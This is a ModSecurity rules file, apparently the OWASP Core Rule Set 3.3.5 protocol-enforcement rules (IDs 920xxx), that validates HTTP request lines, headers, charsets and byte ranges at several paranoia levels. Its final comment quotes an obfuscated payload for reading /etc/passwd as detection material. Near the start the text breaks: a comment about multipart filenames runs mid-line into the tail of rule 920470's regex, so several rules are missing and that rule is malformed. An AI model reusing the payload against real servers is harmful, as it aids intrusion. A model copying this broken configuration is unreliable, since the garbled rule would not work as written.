# # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # Some protocol violations are common in application layer attacks. # Validating HTTP requests eliminates a large number of application layer attacks. # # The purpose of this rules file is to enforce HTTP RFC requirements that state how # the client is supposed to interact with the server. # https://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # # Validate request line against the format specified in the HTTP RFC # # -=[ Rule Logic ]=- # # Uses rule negation against the regex for positive security. The regex specifies the proper # construction of URI request lines such as: # # "http:" "//" host [ ":" port ] [ abs_path [ "?" query ]] # # It also outlines proper construction for CONNECT, OPTIONS and GET requests. 
# # -=[ References ]=- # https://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.2.1 # http://capec.mitre.org/data/definitions/272.html # SecRule REQUEST_LINE "!@rx ^(?i:(?:[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+)?)?/[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?|connect (?:\d{1,3}\.){3}\d{1,3}\.?(?::\d+)?|options \*)\s+[\w\./]+|get /[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?)$" \ "id:920100,\ phase:2,\ block,\ t:none,\ msg:'Invalid HTTP Request Line',\ logdata:'%{request_line}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ ver:'OWASP_CRS/3.3.5',\ severity:'WARNING',\ setvar:'tx.anomaly_score_pl1=+%{tx.warning_anomaly_score}'" # # Identify multipart/form-data name evasion attempts # # There are possible impedance mismatches between how # ModSecurity interprets multipart file names and how # a destination app server such as PHP might parse the # Content-Disposition data: # # filename-parm := "filename" "=" value # # -=[ Rule Logic ]=- # These rules check for the existence of the ' " ; = meta-characters in # either the file or file name variables. # HTML entities may lead to false positives, why they are allowed on PL1. 
# Negative look behind assertions allow frequently used entities &_; # # -=[ Targets, characters and html entities ]=- # # 920120: PL1 : FILES_NAMES, FILES # ['\";=] but allowed: # &[aAoOuUyY]uml); &[aAeEiIoOuU]circ; &[eEiIoOuUyY]acute; # &[aAeEiIoOuU]grave; &[cC]cedil; &[aAnNoO]tilde; & ' # # 920121: PL2 : FILES_NAMES, FILES # ['\";=] : ' " ; = meta-characters # # Not supported by re2 (?@-]+)*$" \ "id:920470,\ phase:1,\ block,\ t:none,t:lowercase,\ msg:'Illegal Content-Type header',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # In case Content-Type header can be parsed, check the mime-type against # the policy defined in the 'allowed_request_content_type' variable. # To change your policy, edit crs-setup.conf and activate rule 900220. 
SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \ "id:920420,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Request content type is not allowed by policy',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.content_type=|%{tx.0}|',\ chain" SecRule TX:content_type "!@within %{tx.allowed_request_content_type}" \ "t:lowercase,\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Restrict charset parameter within the content-type header # SecRule REQUEST_HEADERS:Content-Type "@rx charset\s*=\s*[\"']?([^;\"'\s]+)" \ "id:920480,\ phase:1,\ block,\ capture,\ t:none,t:lowercase,\ msg:'Request content type charset is not allowed by policy',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain" SecRule TX:1 "!@rx ^%{tx.allowed_request_content_type_charset}$" \ "t:none,\ ctl:forceRequestBodyVariable=On,\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Restrict charset parameter inside content type header to occur max once. # SecRule REQUEST_HEADERS:Content-Type "@rx charset.*?charset" \ "id:920530,\ phase:1,\ block,\ t:none,t:lowercase,\ msg:'Multiple charsets detected in content type header',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Restrict protocol versions. 
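#
# Rule 920430: matches when REQUEST_PROTOCOL is not contained in the list held
# in tx.allowed_http_versions.
SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \
    "id:920430,\
    phase:1,\
    block,\
    t:none,\
    msg:'HTTP protocol version is not allowed by policy',\
    logdata:'%{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272',\
    tag:'PCI/6.5.10',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

#
# Restrict file extension
#
# The first rule captures the text after the last dot of REQUEST_BASENAME and
# stores it as ".<ext>/" in tx.extension. The chained rule URL-decodes and
# lowercases that value and matches when it is contained in
# tx.restricted_extensions.
#
SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \
    "id:920440,\
    phase:2,\
    block,\
    capture,\
    t:none,\
    msg:'URL file extension is restricted by policy',\
    logdata:'%{TX.0}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272',\
    tag:'PCI/6.5.10',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.extension=.%{tx.1}/',\
    chain"
    SecRule TX:EXTENSION "@within %{tx.restricted_extensions}" \
        "t:none,t:urlDecodeUni,t:lowercase,\
        setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

#
# Backup or "working" file extension
# example: index.php~, /index.php~/foo/
#
# 'capture' is set so that %{TX.0} in logdata holds the text matched by this
# rule's regex. Without it this rule does not populate TX.0, and the log entry
# can show an empty or unrelated value.
#
SecRule REQUEST_FILENAME "@rx \.[^.~]+~(?:/.*|)$" \
    "id:920500,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,\
    msg:'Attempt to access a backup or working file',\
    logdata:'%{TX.0}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272',\
    tag:'PCI/6.5.10',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

#
# Restricted HTTP headers
#
# -=[ Rule Logic ]=-
# The use of certain headers is restricted. They are listed in the variable
# TX.restricted_headers.
#
# The headers are transformed into lowercase before the match.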
In order to
# make sure that only complete header names are matching, the names in
# TX.restricted_headers are wrapped in slashes. This guarantees that the
# header Range (-> /range/) is not matching the restricted header
# /content-range/ for example.
#
# This is a chained rule, where the first rule fills a set of variables of the
# form TX.header_name_<header_name>. The second rule is then executed for all
# variables of the form TX.header_name_<header_name>.
#
# As a consequence of the construction of the rule, the alert message and the
# alert data will not display the original header name Content-Range, but
# /content-range/ instead.
#
#
# -=[ References ]=-
# https://access.redhat.com/security/vulnerabilities/httpoxy (Header Proxy)
#
# The first rule lowercases each request header name, captures it, and stores
# it wrapped in slashes under tx.header_name_<captured name>. The chained rule
# matches when one of those stored values is contained in
# tx.restricted_headers.
#
SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \
    "id:920450,\
    phase:2,\
    block,\
    capture,\
    t:none,t:lowercase,\
    msg:'HTTP header is restricted by policy (%{MATCHED_VAR})',\
    logdata:'Restricted header detected: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272',\
    tag:'PCI/12.1',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',\
    chain"
    SecRule TX:/^header_name_/ "@within %{tx.restricted_headers}" \
        "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

#
# Restrict response charsets that we allow.
# The following rules make sure that the response will be in an ASCII-compatible charset that
# phase 4 rules can properly understand and block.
#
#
# Some servers rely on the request Accept header to determine what charset to respond with.
# This rule restricts these to familiar charsets.
#
# Regular expression generated from util/regexp-assemble/data/920600.data.
# To update the regular expression run the following shell script # (consult util/regexp-assemble/README.md for details): # util/regexp-assemble/regexp-assemble.py update 920600 # SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+)\/(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+))(?:\s*+;\s*+(?:(?:charset\s*+=\s*+(?:\"?(?:iso-8859-15?|windows-1252|utf-8)\b\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\"(),\/:;<=>?![\x5c\]{}]|[^e\"(),/:;<=>?![\x5c\]{}])|[^s\"(),/:;<=>?![\x5c\]{}])|[^r\"(),/:;<=>?![\x5c\]{}])|[^a\"(),/:;<=>?![\x5c\]{}])|[^h\"(),/:;<=>?![\x5c\]{}])|[^c\"(),/:;<=>?![\x5c\]{}])[^\"(),/:;<=>?![\x5c\]{}]*(?:)\s*+=\s*+[^(),/:;<=>?![\x5c\]{}]+)|;?))*(?:\s*+,\s*+(?:(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+)\/(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+))(?:\s*+;\s*+(?:(?:charset\s*+=\s*+(?:\"?(?:iso-8859-15?|windows-1252|utf-8)\b\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\"(),\/:;<=>?![\x5c\]{}]|[^e\"(),/:;<=>?![\x5c\]{}])|[^s\"(),/:;<=>?![\x5c\]{}])|[^r\"(),/:;<=>?![\x5c\]{}])|[^a\"(),/:;<=>?![\x5c\]{}])|[^h\"(),/:;<=>?![\x5c\]{}])|[^c\"(),/:;<=>?![\x5c\]{}])[^\"(),/:;<=>?![\x5c\]{}]*(?:)\s*+=\s*+[^(),/:;<=>?![\x5c\]{}]+)|;?))*)*$" \ "id:920600,\ phase:1,\ block,\ t:none,t:lowercase,\ msg:'Illegal Accept header: charset parameter',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # The following rule (920620) checks for the presence of 2 or more request Content-Type headers. # Content-Type confusion poses a significant security risk to a web application. It occurs when # the server and client have different interpretations of the Content-Type header, leading to # miscommunication, potential exploitation and WAF bypass. 
#
# Using Apache, when multiple Content-Type request headers are received, the server combines them
# into a single header with the values separated by commas. For example, if a client sends multiple
# Content-Type headers with values "application/json" and "text/plain", Apache will combine them
# into a single header like this: "Content-Type: application/json, text/plain".
#
# On the other hand, Nginx handles multiple Content-Type headers differently. It preserves each
# header as a separate entity without combining them. So, if a client sends multiple Content-Type
# headers, Nginx will keep them separate, maintaining the original values.
#
# The rule counts the Content-Type request headers (the & prefix) and matches
# when the count is greater than 1.
# NOTE(review): where the server has already merged the headers into one
# comma-separated value, as described above for Apache, the count seen here is
# presumably 1. Confirm that the merged value is rejected by the Content-Type
# format check (rule 920470) in such deployments.
#
SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \
    "id:920620,\
    phase:1,\
    block,\
    t:none,\
    msg:'Multiple Content-Type Request Headers',\
    logdata:'%{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"


# Skip the rest of this file (up to the END marker) in both phases when the
# executing paranoia level is below 2.
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#

#
# -=[ Rule Logic ]=-
#
# Check the number of range fields in the Range request header.
#
# An excessive number of Range request headers can be used to DoS a server.
# The original CVE proposed an arbitrary upper limit of 5 range fields.
#
# Several clients are known to request PDF fields with up to 62 range
# fields. Therefore the standard rule does not cover PDF files. This is
# performed in two separate (stricter) siblings of this rule.
# # 920200: PL2: Limit of 5 range header fields for all filenames outside of PDFs # 920201: PL2: Limit of 62 range header fields for PDFs # 920202: PL4: Limit of 5 range header fields for PDFs # # -=[ References ]=- # https://httpd.apache.org/security/CVE-2011-3192.txt SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ "id:920200,\ phase:2,\ block,\ t:none,\ msg:'Range: Too many fields (6 or more)',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/2',\ ver:'OWASP_CRS/3.3.5',\ severity:'WARNING',\ chain" SecRule REQUEST_BASENAME "!@endsWith .pdf" \ "setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" # # This is a sibling of rule 920200 # SecRule REQUEST_BASENAME "@endsWith .pdf" \ "id:920201,\ phase:2,\ block,\ t:none,\ msg:'Range: Too many fields for pdf request (63 or more)',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/2',\ ver:'OWASP_CRS/3.3.5',\ severity:'WARNING',\ chain" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \ "setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" SecRule ARGS "@rx %[0-9a-fA-F]{2}" \ "id:920230,\ phase:2,\ block,\ t:none,\ msg:'Multiple URL Encoding Detected',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267/120',\ tag:'paranoia-level/2',\ ver:'OWASP_CRS/3.3.5',\ severity:'WARNING',\ setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" # # Missing Accept Header # # -=[ Rule Logic ]=- # This rule generates a notice if the Accept header is missing. 
#
# Notice: The rule tries to avoid known false positives by ignoring
# OPTIONS requests coming from known offending User-Agents via two
# chained rules.
# As ModSecurity only reports the match of the last matching rule,
# the alert is misleading.
#
# As chained, the rule only scores when all three conditions hold: there is no
# Accept header, the method is not OPTIONS, and the User-Agent value contains
# neither "AppleWebKit" nor "Android". Either exclusion on its own is enough to
# suppress the notice, so treat this rule as a weak signal during triage.
#
SecRule &REQUEST_HEADERS:Accept "@eq 0" \
    "id:920300,\
    phase:2,\
    pass,\
    t:none,\
    msg:'Request Missing an Accept Header',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272',\
    tag:'PCI/6.5.10',\
    tag:'paranoia-level/2',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'NOTICE',\
    chain"
    SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \
        "chain"
        SecRule REQUEST_HEADERS:User-Agent "!@pm AppleWebKit Android" \
            "t:none,\
            setvar:'tx.anomaly_score_pl2=+%{tx.notice_anomaly_score}'"

#
# PL2: This is a stricter sibling of 920270.
#
# After URL-decoding, the only bytes accepted in the listed variables are
# 9, 10, 13, 32-126 and 128-255; any other byte triggers the rule.
#
SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13,32-126,128-255" \
    "id:920271,\
    phase:2,\
    block,\
    t:none,t:urlDecodeUni,\
    msg:'Invalid character in request (non printable characters)',\
    logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272',\
    tag:'paranoia-level/2',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"

#
# Missing User-Agent Header
#
# -=[ Rule Logic ]=-
# This rule checks whether a User-Agent header is present. A request without
# one adds the notice score at PL2; the rule action is 'pass', so it does not
# block by itself.
#
SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \
    "id:920320,\
    phase:2,\
    pass,\
    t:none,\
    msg:'Missing User Agent Header',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272',\
    tag:'PCI/6.5.10',\
    tag:'paranoia-level/2',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'NOTICE',\
    setvar:'tx.anomaly_score_pl2=+%{tx.notice_anomaly_score}'"

#
# PL2: This is a stricter sibling of 920120.
#
# Rule 920121: after URL-decoding, any of the characters ' " ; = in an uploaded
# file name or file field name triggers the rule.
SecRule FILES_NAMES|FILES "@rx ['\";=]" \
    "id:920121,\
    phase:2,\
    block,\
    t:none,t:urlDecodeUni,\
    msg:'Attempted multipart/form-data bypass',\
    logdata:'%{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272',\
    tag:'paranoia-level/2',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"

#
# PL2: Block on Missing Content-Type Header with Request Body
# This is a stricter sibling of rule 920340.
#
# -=[ References ]=-
# http://httpwg.org/specs/rfc7231.html#header.content-type
#
# The rule matches when the Content-Length header value is anything other than
# "0" and no Content-Type header is present.
# NOTE(review): the first condition is evaluated against the Content-Length
# header. A request that carries a body without that header (for example with
# chunked transfer encoding) presumably does not reach the chained check.
# Confirm how the deployment covers that case.
SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \
    "id:920341,\
    phase:2,\
    block,\
    t:none,\
    msg:'Request Containing Content Requires Content-Type header',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'paranoia-level/2',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    chain"
    SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \
        "t:none,\
        setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"


# Skip the rest of this file (up to the END marker) in both phases when the
# executing paranoia level is below 3.
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#

#
# PL 3: This is a stricter sibling of 920270.
Ascii range: Printable characters in the low range # # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 32-36,38-126" \ "id:920272,\ phase:2,\ block,\ t:none,t:urlDecodeUni,\ msg:'Invalid character in request (outside of printable chars below ascii 127)',\ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/3',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # # PL3: The little known x-up-devcap-post-charset request header can be used to submit # a request with a different encoding as an alternative to the charset parameter in # the Content-Type header. This can be used to circumvent charset restrictions on # the Content-Type header in ASP.NET. # Note that this only works in combination with a User-Agent prefix. 
#
# This rule is based on a blog post by Soroush Dalili at
# https://soroush.secproject.com/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/
#
# The rule matches when at least one x-up-devcap-post-charset header is present
# and the User-Agent value starts with "up" (compared case-insensitively).
#
SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \
    "id:920490,\
    phase:1,\
    block,\
    t:none,\
    msg:'Request header x-up-devcap-post-charset detected in combination with prefix \'UP\' to User-Agent',\
    logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\
    tag:'language-aspnet',\
    tag:'platform-windows',\
    tag:'attack-protocol',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272',\
    tag:'paranoia-level/3',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    chain"
    SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up" \
        "t:none,\
        setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"

#
# Cache-Control Request Header whitelist
#
# -=[ Rule Logic ]=-
# This rule aims to strictly whitelist the Cache-Control request header
# values and to block all violations. This should be useful to intercept
# "bad bots" and tools that impersonate a real browser but with a wrong
# request header setup.
#
# The regular expression used in this rule tries to match multiple directives
# in a single value, for example: "max-stale=1, max-age=2". This leads us to
# use a regular expression that accepts a trailing comma to keep compatibility
# with all regex engines and not PCRE only. For example: "max-stale=1, max-age=2, "
#
# Moreover, this regular expression allows sequences with duplicate directives, like:
# "max-stale, max-stale=1, no-cache, no-cache".
# # Standard Cache-Control directives that can be used by the client: # - max-age= # - max-stale[=] # - min-fresh= # - no-cache # - no-store # - no-transform # - only-if-cached # # References: # - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control # - https://regex101.com/r/CZ0Hxu/22 # SecRule &REQUEST_HEADERS:Cache-Control "@gt 0" \ "id:920510,\ phase:1,\ block,\ t:none,\ msg:'Invalid Cache-Control request header',\ logdata:'Invalid Cache-Control value in request found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'header-whitelist',\ tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(\s*\,\s*|$)){1,7}$" \ "setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # This is a stricter sibling of rule 920200 # SecRule REQUEST_BASENAME "@endsWith .pdf" \ "id:920202,\ phase:2,\ block,\ t:none,\ msg:'Range: Too many fields for pdf request (6 or more)',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/4',\ ver:'OWASP_CRS/3.3.5',\ severity:'WARNING',\ chain" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ "setvar:'tx.anomaly_score_pl4=+%{tx.warning_anomaly_score}'" # # This is a 
stricter sibling of 920270. # # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # SecRule ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 38,44-46,48-58,61,65-90,95,97-122" \ "id:920273,\ phase:2,\ block,\ t:none,t:urlDecodeUni,\ msg:'Invalid character in request (outside of very strict set)',\ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/4',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # # This is a stricter sibling of 920270. # SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,65-90,95,97-122" \ "id:920274,\ phase:2,\ block,\ t:none,t:urlDecodeUni,\ msg:'Invalid character in request headers (outside of very strict set)',\ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/4',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # # This is a stricter sibling of 920270. # The 'Sec-Fetch-User' header may contain the '?' (63) character. # Therefore we exclude this header from rule 920274 which forbids '?'. 
# https://www.w3.org/TR/fetch-metadata/#http-headerdef-sec-fetch-user
#
# After URL-decoding, the Sec-Fetch-User value may only contain the listed
# bytes, which include 63 ('?'); any other byte triggers the rule.
#
SecRule REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,63,65-90,95,97-122" \
    "id:920275,\
    phase:2,\
    block,\
    t:none,t:urlDecodeUni,\
    msg:'Invalid character in request headers (outside of very strict set)',\
    logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272',\
    tag:'paranoia-level/4',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'"


# -=[ Abnormal Character Escapes ]=-
#
# [ Rule Logic ]
# Consider the following payload: arg=cat+/e\tc/pa\ssw\d
# Here, \s and \d were only used to obfuscate the string passwd and a lot of
# parsers will silently ignore the unnecessary escapes. The case with \t is
# a bit different though, as \t is a natural escape for the TAB character,
# so we will avoid this (and \n, \r, etc.).
#
# This rule aims to detect unnecessary, abnormal escapes. You could say it is
# a nice way to forbid the backslash character where it is not needed.
#
